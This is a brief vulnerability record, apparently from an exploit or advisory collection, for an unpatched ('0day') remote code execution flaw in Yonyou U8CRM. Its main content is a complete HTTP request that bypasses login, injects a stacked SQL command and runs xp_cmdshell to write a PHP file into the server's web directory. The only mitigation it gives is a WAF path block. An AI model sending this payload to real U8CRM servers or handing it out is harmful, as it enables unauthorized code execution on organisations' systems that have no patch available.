vendor = "用友"
name = "用友 U8CRM 远程代码执行漏洞"
type = "RCE"
version = "未知"
path = "/bgt/reservationcomplete.php"
detail = "GET /bgt/reservationcomplete.php?DontCheckLogin=1&ID=1112;exec%20master..xp_cmdshell%20%27echo%20^%3C?php%20echo%20hello;?^%3E%20%3E%20D:\\U8SOFT\\turbocrm70\\code\\www\\hello.php%27; HTTP/1.1 Host:"
fix = "WAF封禁路路径，等待发布补丁"
date = "0814"
label = "0day"
